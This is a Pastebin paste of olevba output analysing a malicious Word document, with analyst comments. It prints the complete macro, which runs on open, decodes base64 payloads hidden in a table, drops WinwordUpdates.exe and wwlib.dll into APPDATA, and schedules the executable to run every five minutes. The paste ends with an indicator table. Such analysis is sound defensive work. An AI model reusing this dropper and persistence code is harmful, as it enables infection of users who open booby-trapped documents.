Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.53.1 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- MHT:MASIHB-- d1901f0b6266e4be23d805daaed7a10e1d0abcc5e30ed7c38803d13b80caf74d.doc
- ===============================================================================
- FILE: d1901f0b6266e4be23d805daaed7a10e1d0abcc5e30ed7c38803d13b80caf74d.doc
- Type: MHTML
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: None - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Sub Document_Open()
- Dim sAppData As String // declare variables
- sAppData = Environ("APPDATA") // get environment veriable https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/environ-function
- sAppData = sAppData & "\WinwordUpdates.exe" // string concatenation
- Dim sAppData1 As String
- sAppData1 = Environ("APPDATA")
- sAppData1 = sAppData1 & "\wwlib.dll"
- Dim b As String
- Dim a As String
- Dim tableNew As Table // Table object type https://docs.microsoft.com/en-us/office/vba/api/word.table
- Set tableNew = ActiveDocument.Tables(1) // Get first table of the active document https://docs.microsoft.com/en-us/office/vba/api/word.table
- a = tableNew.Cell(1, 1).Range.Text // at (row, column)
- a = Left(a, Len(a) - 2) // slice [:len]
- b = Base64Decode(a) // invoke function
- Dim fso As Object // like Object in java (object-oriented) https://docs.microsoft.com/en-us/office/vba/language/concepts/getting-started/creating-object-variables
- Set fso = CreateObject("Scripting.FileSystemObject") // File system object https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/filesystemobject-object
- Dim oFile As Object
- Set oFile = fso.CreateTextFile(sAppData) // get handle to the stream https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/textstream-object
- oFile.Write b
- oFile.Close // drop WinwordUpdates.exe to %APPDATA%\WinwordUpdates.exe
- Dim c As String // similar
- Dim d As String
- c = tableNew.Cell(1, 2).Range.Text
- c = Left(c, Len(c) - 2)
- d = Base64Decode(c)
- Dim fso1 As Object
- Set fso1 = CreateObject("Scripting.FileSystemObject")
- Dim oFile1 As Object
- Set oFile1 = fso1.CreateTextFile(sAppData1)
- oFile1.Write d
- oFile1.Close // drop wwlib.dll to %APPDATA%\WinwordUpdates.exe
- yiBhyERIualWRmBjcsIbCZLq // call function with no parameter
- Set fso = Nothing // set to null https://docs.microsoft.com/en-us/office/vba/language/reference/user-interface-help/nothing-keyword
- Set oFile = Nothing
- Set fso1 = Nothing
- Set oFile1 = Nothing
- End Sub
- Function Base64Decode(ByVal base64String) As String // self-explained
- Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
- Dim dataLength, sOut, groupBegin
- base64String = Replace(base64String, vbCrLf, "")
- base64String = Replace(base64String, vbTab, "")
- base64String = Replace(base64String, " ", "")
- dataLength = Len(base64String)
- If dataLength Mod 4 <> 0 Then
- Err.Raise 1, "Base64Decode", "Bad Base64 string."
- Exit Function
- End If
- For groupBegin = 1 To dataLength Step 4
- Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
- numDataBytes = 3
- nGroup = 0
- For CharCounter = 0 To 3
- thisChar = Mid(base64String, groupBegin + CharCounter, 1)
- If thisChar = "=" Then
- numDataBytes = numDataBytes - 1
- thisData = 0
- Else
- thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
- End If
- If thisData = -1 Then
- Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
- Exit Function
- End If
- nGroup = 64 * nGroup + thisData
- Next
- nGroup = Hex(nGroup)
- nGroup = String(6 - Len(nGroup), "0") & nGroup
- pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
- Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
- Chr(CByte("&H" & Mid(nGroup, 5, 2)))
- sOut = sOut & Left(pOut, numDataBytes)
- Next
- Base64Decode = sOut
- End Function
- Function yiBhyERIualWRmBjcsIbCZLq() // Template Code https://docs.microsoft.com/en-us/windows/desktop/taskschd/daily-trigger-example--scripting-
- Dim sAppData As String
- sAppData = Environ("APPDATA")
- sAppData = sAppData & "\WinwordUpdates.exe"
- Const TriggerTypeTime = 1
- Const ActionTypeExec = 0
- Set service = CreateObject("Schedule.Service") // Create the TaskService object
- Call service.Connect
- Dim rootFolder
- Set rootFolder = service.GetFolder("\")
- Dim taskDefinition
- Set taskDefinition = service.NewTask(0)
- Dim principal // security logon method that is required to run the tasks https://docs.microsoft.com/en-us/windows/desktop/taskschd/principal-logontype
- Set principal = taskDefinition.principal
- principal.LogonType = 3 // User must already be logged on. The task will be run only in an existing interactive session
- Dim settings // https://docs.microsoft.com/en-us/windows/desktop/taskschd/taskschedulerschema-settings-tasktype-element
- Set settings = taskDefinition.settings
- settings.Enabled = True
- settings.StartWhenAvailable = True
- settings.Hidden = False
- Dim triggers // https://docs.microsoft.com/en-us/windows/desktop/taskschd/daily-trigger-example--scripting- ( see 4)
- Set triggers = taskDefinition.triggers // https://docs.microsoft.com/en-us/windows/desktop/taskschd/taskdefinition-triggers
- Dim trigger
- Set trigger = triggers.Create(TriggerTypeTime)
- Dim startTime, endTime
- Dim time
- time = DateAdd("s", 30, Now)
- startTime = XmlTime(time)
- trigger.StartBoundary = startTime // task runs after 30s
- trigger.Enabled = True
- Dim Repetition
- Set Repetition = trigger.Repetition
- Repetition.Interval = "PT" & "5" & "M" // for 5 minues https://docs.microsoft.com/en-us/windows/desktop/taskschd/taskschedulerschema-duration-repetitiontype-element
- Dim Action
- Set Action = taskDefinition.Actions.Create(ActionTypeExec)
- Action.Path = sAppData
- Action.Arguments = ""
- Call rootFolder.RegisterTaskDefinition("WinwordUpdates", taskDefinition, 6, , , 3)
- End Function
- Function XmlTime(t) // convert to xml format
- Dim cSecond, cMinute, CHour, cDay, cMonth, cYear
- Dim tTime, tDate
- cSecond = "0" & Second(t)
- cMinute = "0" & Minute(t)
- CHour = "0" & Hour(t)
- cDay = "0" & Day(t)
- cMonth = "0" & Month(t)
- cYear = Year(t)
- tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & _
- ":" & Right(cSecond, 2)
- tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)
- XmlTime = tDate & "T" & tTime
- End Function
- +------------+--------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------------+-----------------------------------------+
- | AutoExec | Document_Open | Runs when the Word or Publisher |
- | | | document is opened |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings (use option --deobf to |
- | | | deobfuscate) |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | CreateTextFile | May create a text file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | WinwordUpdates.exe | Executable file name |
- | IOC | wwlib.dll | Executable file name |
- +------------+--------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement